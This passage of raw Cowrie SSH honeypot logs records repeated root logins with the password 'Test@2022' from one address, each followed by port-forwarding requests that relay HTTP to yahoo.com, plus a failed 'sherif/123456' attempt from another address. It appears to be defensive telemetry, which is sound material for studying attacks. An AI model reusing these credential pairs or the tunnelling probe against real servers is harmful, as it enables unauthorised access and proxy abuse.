 client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.191230Z","src_ip":"213.209.150.239","session":"f1ac61d61453"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.426079Z","src_ip":"213.209.150.239","session":"f1ac61d61453"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":24786,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:24786","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.474259Z","session":"f1ac61d61453"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.521526Z","src_ip":"213.209.150.239","session":"f1ac61d61453"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":53296,"dst_ip":"1.2.3.4","dst_port":22,"session":"735f49a770db","protocol":"ssh","message":"New connection: 36.89.28.139:53296 (1.2.3.4:22) [session: 735f49a770db]","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.581113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.582022Z","src_ip":"36.89.28.139","session":"735f49a770db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":2370,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2370","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.657387Z","session":"f1ac61d61453"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.705492Z","src_ip":"213.209.150.239","session":"f1ac61d61453"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.753582Z","src_ip":"213.209.150.239","session":"f1ac61d61453"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8480,"dst_ip":"1.2.3.4","dst_port":22,"session":"0132cd5a8292","protocol":"ssh","message":"New connection: 213.209.150.239:8480 (1.2.3.4:22) [session: 0132cd5a8292]","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.809256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.810016Z","src_ip":"213.209.150.239","session":"0132cd5a8292"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:25.866951Z","src_ip":"213.209.150.239","session":"0132cd5a8292"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.149920Z","src_ip":"213.209.150.239","session":"0132cd5a8292"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":8694,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:8694","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.207773Z","session":"0132cd5a8292"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.265673Z","src_ip":"213.209.150.239","session":"0132cd5a8292"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.308938Z","src_ip":"36.89.28.139","session":"735f49a770db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":20456,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:20456","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.423090Z","session":"0132cd5a8292"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.479867Z","src_ip":"213.209.150.239","session":"0132cd5a8292"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.537588Z","src_ip":"213.209.150.239","session":"0132cd5a8292"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8544,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c04c0d3d516","protocol":"ssh","message":"New connection: 213.209.150.239:8544 (1.2.3.4:22) [session: 0c04c0d3d516]","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.583776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.584773Z","src_ip":"213.209.150.239","session":"0c04c0d3d516"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.631720Z","src_ip":"213.209.150.239","session":"0c04c0d3d516"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.867190Z","src_ip":"213.209.150.239","session":"0c04c0d3d516"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":23103,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:23103","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.915834Z","session":"0c04c0d3d516"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:26.963054Z","src_ip":"213.209.150.239","session":"0c04c0d3d516"}
{"eventid":"cowrie.login.failed","username":"sherif","password":"123456","message":"login attempt [sherif/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.049275Z","src_ip":"36.89.28.139","session":"735f49a770db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":12160,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:12160","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.101523Z","session":"0c04c0d3d516"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.148784Z","src_ip":"213.209.150.239","session":"0c04c0d3d516"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.196928Z","src_ip":"213.209.150.239","session":"0c04c0d3d516"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8592,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5ea6f5f74d9","protocol":"ssh","message":"New connection: 213.209.150.239:8592 (1.2.3.4:22) [session: e5ea6f5f74d9]","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.243300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.244153Z","src_ip":"213.209.150.239","session":"e5ea6f5f74d9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.291904Z","src_ip":"213.209.150.239","session":"e5ea6f5f74d9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.526990Z","src_ip":"213.209.150.239","session":"e5ea6f5f74d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":12550,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:12550","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.575580Z","session":"e5ea6f5f74d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.623108Z","src_ip":"213.209.150.239","session":"e5ea6f5f74d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":24406,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:24406","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.757671Z","session":"e5ea6f5f74d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.805841Z","src_ip":"213.209.150.239","session":"e5ea6f5f74d9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.854270Z","src_ip":"213.209.150.239","session":"e5ea6f5f74d9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8647,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee531ad1651d","protocol":"ssh","message":"New connection: 213.209.150.239:8647 (1.2.3.4:22) [session: ee531ad1651d]","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.909389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.910233Z","src_ip":"213.209.150.239","session":"ee531ad1651d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:27.966598Z","src_ip":"213.209.150.239","session":"ee531ad1651d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.225337Z","src_ip":"36.89.28.139","session":"735f49a770db"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.247441Z","src_ip":"213.209.150.239","session":"ee531ad1651d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":5654,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:5654","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.305642Z","session":"ee531ad1651d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.362145Z","src_ip":"213.209.150.239","session":"ee531ad1651d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":15529,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:15529","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.518880Z","session":"ee531ad1651d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.575506Z","src_ip":"213.209.150.239","session":"ee531ad1651d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.632614Z","src_ip":"213.209.150.239","session":"ee531ad1651d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8703,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcda999d8696","protocol":"ssh","message":"New connection: 213.209.150.239:8703 (1.2.3.4:22) [session: fcda999d8696]","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.678779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.679651Z","src_ip":"213.209.150.239","session":"fcda999d8696"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5"